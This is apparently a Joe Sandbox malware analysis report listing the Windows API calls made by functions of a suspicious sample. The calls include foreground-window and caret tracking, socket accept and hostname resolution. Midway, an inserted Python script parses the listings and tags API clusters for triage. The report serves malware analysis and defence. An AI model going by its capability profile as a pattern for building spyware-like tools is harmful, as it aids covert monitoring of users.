                                                                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 004503C8
                                                                                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Proc$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2351499541-0
                                                                                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
• Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
• Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
APIs
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
• _wcslen.LIBCMT ref: 00449519
• _wcslen.LIBCMT ref: 00449526
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: MessageSend_wcslen$_wcspbrk
• String ID:
• API String ID: 2886238975-0
• Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
• Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: __setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 1792727568-0
• Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
• Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
• Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
APIs
  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
• lstrlenW.KERNEL32(?), ref: 00434CF6
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
• lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen$_malloc
• String ID: cdecl
• API String ID: 3850814276-3896280584
• Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
• Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
• Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
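The API listings above (the blocks headed APIs, from the PeekMessageW message pump through the gethostbyname/inet_ntoa resolver) share one line shape: a bullet, an optional "Part of subcall function" prefix, API.MODULE(args), and a ref: address. When triaging a report of this size it is faster to parse those lines than to read them, and to flag functions by the API combinations they reach rather than by single calls. The Python below is an added example for this report, not Joe Sandbox code and not code from the sample; it parses such listings into per-function records and tags API clusters. The SIGNATURES table and its tag names are this example's own heuristics, not Joe Sandbox signatures, and SAMPLE is a constructed excerpt copied from the listings in this section with the memory-dump lines shortened.

```python
"""Parse Joe Sandbox 'APIs' listings into per-function records and tag API clusters.
Added example for this report; not Joe Sandbox code. SIGNATURES is this example's
own heuristic reading of API combinations, not a sandbox verdict."""
import re

# One API reference line, in the three shapes that occur in the listing:
#   • GetCaretPos.USER32(?), ref: 004743B2
#   • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
#   • _wcslen.LIBCMT ref: 00449519
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Identity fields that follow the memory-dump section ("API String ID" is deliberately not one).
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID):\s*(?P<val>.*?)\s*$")

# Constructed input: an excerpt copied from this section's listings, dump lines shortened.
SAMPLE = """\
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
"""


def parse_report(text):
    """One record per 'APIs' block: its calls, then the API/String/Opcode ID fields."""
    records, current, in_apis = [], None, False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"calls": [], "api_id": "", "string_id": "", "opcode_id": ""}
            records.append(current)
            in_apis = True
            continue
        if current is None:
            continue
        if stripped in ("Memory Dump Source", "Strings"):  # end of the call list
            in_apis = False
            continue
        if in_apis:
            m = API_LINE.match(line)
            if m:
                current["calls"].append({
                    "api": m["api"], "module": m["mod"], "ref": m["ref"],
                    "args": tuple(m["args"].split(",")) if m["args"] else (),
                    "subcall": m["sub"],  # None for the function's own calls
                })
            continue
        m = FIELD_LINE.match(line)
        if m:
            current[m["key"].lower().replace(" ", "_")] = m["val"]
    return records


# Heuristic clusters (this example's own; confirm each in the disassembly before reporting it).
SIGNATURES = {
    "message pump": {"PeekMessageW", "TranslateMessage", "DispatchMessageW"},
    "foreground caret tracking": {"GetForegroundWindow", "AttachThreadInput", "GetCaretPos"},
    "layered window attributes": {"SetWindowLongW", "SetLayeredWindowAttributes"},
    "hostname resolution": {"gethostbyname", "inet_ntoa"},
}


def tag_capabilities(record, include_subcalls=True):
    """Sorted cluster tags whose every API the function reaches (subcalls count unless excluded)."""
    names = {c["api"] for c in record["calls"] if include_subcalls or c["subcall"] is None}
    return sorted(tag for tag, needed in SIGNATURES.items() if needed <= names)


def summarize(text):
    """Map each function (by Opcode ID, else API ID) to its cluster tags."""
    return {r["opcode_id"] or r["api_id"]: tag_capabilities(r) for r in parse_report(text)}


if __name__ == "__main__":
    for ident, tags in summarize(SAMPLE).items():
        print(ident[:16], tags)
```

The include_subcalls switch matters: in the caret-tracking function above, AttachThreadInput is reached only through subcall 004439C1, so tagging on the function's own calls alone misses the cluster. Treat a tag as a pointer to the Opcode ID worth opening in the disassembly, not as a finding in itself.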
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                    APIs
                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 385091864-0
                                                                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1358664141-0
                                                                                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880819207-0
                                                                                                                    • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                    • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                    • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                    • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                    • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                    • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                    • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1187119602-0
                                                                                                                    • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                    • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                    • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                    • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1597257046-0
                                                                                                                    • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                    • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                    • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                    • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
APIs
Memory Dump Source
